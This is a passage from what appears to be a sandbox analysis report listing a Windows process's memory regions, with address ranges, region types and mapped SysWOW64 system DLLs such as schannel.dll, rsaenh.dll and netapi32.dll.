filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1955 start_va = 0x74c40000 end_va = 0x74c4cfff monitored = 0 entry_point = 0x74c41326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1956 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1957 start_va = 0x2380000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1958 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1959 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1960 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 1961 start_va = 0x74c30000 end_va = 0x74c35fff monitored = 0 entry_point = 0x74c3125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1962 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1963 start_va = 0x1fc0000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 1964 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1965 start_va = 0x2580000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 1966 start_va = 0x74c10000 end_va = 0x74c26fff monitored = 0 entry_point = 0x74c11c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1967 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1968 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1969 start_va = 0x75270000 end_va = 0x7529efff monitored = 0 entry_point = 0x75272a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1970 start_va = 0x74bd0000 end_va = 0x74c0efff monitored = 0 entry_point = 0x74bd2351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1971 start_va = 0x74bc0000 end_va = 0x74bcffff monitored = 0 entry_point = 0x74bc38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1972 start_va = 0x2680000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1973 start_va = 0x2760000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 1974 start_va = 0x28f0000 end_va = 0x2acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 1975 start_va = 0x74bb0000 end_va = 0x74bb5fff monitored = 0 entry_point = 0x74bb14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1976 start_va = 0x2e0000 end_va = 0x2e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 1977 start_va = 0x2760000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 1978 start_va = 0x28e0000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 1979 start_va = 0x73900000 end_va = 0x73908fff monitored = 0 entry_point = 0x73901220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1980 start_va = 0x2f0000 end_va = 0x2f7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 1981 start_va = 0x2000000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1982 start_va = 0x74b70000 end_va = 0x74babfff monitored = 0 entry_point = 0x74b7145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1983 start_va = 0x28f0000 end_va = 0x2acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 1984 start_va = 0x74b60000 end_va = 0x74b64fff monitored = 0 entry_point = 0x74b615df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1985 start_va = 0x74b50000 end_va = 0x74b55fff monitored = 0 entry_point = 0x74b51673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1986 start_va = 0x74b10000 end_va = 0x74b47fff monitored = 0 entry_point = 0x74b1990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1987 start_va = 0x28f0000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 1988 start_va = 0x2a90000 end_va = 0x2acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 1989 start_va = 0x2680000 end_va = 0x26bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1990 start_va = 0x2750000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 1991 start_va = 0x2ad0000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 1992 start_va = 0x74af0000 end_va = 0x74b06fff monitored = 0 entry_point = 0x74af3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1993 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1994 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1995 start_va = 0x74ae0000 end_va = 0x74ae7fff monitored = 0 entry_point = 0x74ae34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1996 start_va = 0x74b00000 end_va = 0x74b07fff monitored = 0 entry_point = 0x74b010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1997 start_va = 0x74aa0000 end_va = 0x74ad7fff monitored = 0 entry_point = 0x74aa1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1998 start_va = 0x74a80000 end_va = 0x74a96fff monitored = 0 entry_point = 0x74a835fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1999 start_va = 0x74a40000 end_va = 0x74a7cfff monitored = 0 entry_point = 0x74a410f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2000 start_va = 0x74a20000 end_va = 0x74a36fff monitored = 0 entry_point = 0x74a23573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2001 start_va = 0x26c0000 end_va = 0x26fbfff monitored = 0 entry_point = 0x26c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2002 start_va = 0x26c0000 end_va = 0x26fbfff monitored = 0 entry_point = 0x26c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2003 start_va = 0x26c0000 end_va = 0x26fbfff monitored = 0 entry_point = 0x26c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2004 start_va = 0x26c0000 end_va = 0x26fbfff monitored = 0 entry_point = 0x26c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2005 start_va = 0x26c0000 end_va = 0x26fbfff monitored = 0 entry_point = 0x26c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2006 start_va = 0x749e0000 end_va = 0x74a1afff monitored = 0 entry_point = 0x749e128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2007 start_va = 0x2bd0000 end_va = 0x2ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 2008 start_va = 0x749c0000 end_va = 0x749d5fff monitored = 0 entry_point = 0x749c2061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 2282 start_va = 0x680000 end_va = 0x689fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 2283 start_va = 0x77430000 end_va = 0x77434fff monitored = 0 entry_point = 0x77431438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2284 start_va = 0x2cd0000 end_va = 0x2ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 2285 start_va = 0x749a0000 end_va = 0x749b1fff monitored = 0 entry_point = 0x749a3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2286 start_va = 0x74920000 end_va = 0x7499ffff monitored = 0 entry_point = 0x749337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2287 start_va = 0x2ed0000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 2288 start_va = 0x28f0000 end_va = 0x29cefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028f0000" filename = "" Region: id = 2289 start_va = 0x29e0000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 2290 start_va = 0x74900000 end_va = 0x74912fff monitored = 0 entry_point = 0x74901d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2291 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 2292 start_va = 0x26c0000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 2293 start_va = 0x2700000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2294 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2295 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2296 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2297 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2298 start_va = 0x74af0000 end_va = 0x74af7fff monitored = 0 entry_point = 0x74af1356 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 2299 start_va = 0x738b0000 end_va = 0x738d8fff monitored = 0 entry_point = 0x738b6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2300 start_va = 0x748e0000 end_va = 0x748f3fff monitored = 0 entry_point = 0x748e15c9 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 2301 start_va = 0x748c0000 end_va = 0x748d6fff monitored = 0 entry_point = 0x748c1549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 2302 start_va = 0x748b0000 end_va = 0x748b7fff monitored = 0 entry_point = 0x748b3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 2303 start_va = 0x748a0000 end_va = 0x748aefff monitored = 0 entry_point = 0x748a12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 2304 start_va = 0x74890000 end_va = 0x7489afff monitored = 0 entry_point = 0x74891200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 2305 start_va = 0x74880000 end_va = 0x74888fff monitored = 0 entry_point = 0x748815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2306 start_va = 0x74870000 end_va = 0x7487cfff monitored = 0 entry_point = 0x748712d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 2309 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2310 start_va = 0x74760000 end_va = 0x74770fff monitored = 0 entry_point = 0x74761300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 2311 start_va = 0x74740000 end_va = 0x74758fff monitored = 0 entry_point = 0x74741319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2312 start_va = 0x2740000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 2313 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2314 start_va = 0x3610000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003610000" filename = "" Region: id = 2315 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2316 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2317 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2318 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2319 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2320 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2321 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2322 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2323 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2324 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2325 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2326 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2327 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2328 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2329 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2330 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2331 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2332 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2333 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2334 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2335 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2336 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2337 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2338 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2339 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2340 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2341 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2342 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2343 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2344 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2345 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2346 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2347 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2348 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2349 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2350 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2351 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2352 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2353 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2354 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2355 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2356 start_va = 0x3200000 end_va = 0x360ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003200000" filename = "" Region: id = 2357 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2358 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2359 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2360 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2361 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2362 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2363 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2364 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2365 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2366 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2367 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2368 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2369 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2370 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2371 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2372 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2373 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2374 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2375 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2376 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2377 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2378 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2379 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2380 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2381 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2382 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2383 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2384 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2385 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2386 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2387 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2388 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 2389 start_va = 0x2860000 end_va = 0x2879fff monitored = 1 entry_point = 0x0 region_type = 